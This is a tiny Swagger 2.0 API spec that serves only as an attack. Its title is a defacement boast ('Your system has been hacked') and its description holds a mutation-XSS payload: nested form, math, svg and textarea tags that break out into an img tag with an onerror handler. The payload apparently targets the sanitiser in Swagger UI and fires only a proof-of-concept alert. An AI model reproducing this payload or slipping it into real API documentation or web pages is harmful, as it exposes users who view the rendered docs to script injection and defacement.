swagger: '2.0'
info:
  title: PakTiko was here. Your system has been hacked!!!!!
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
  version: production

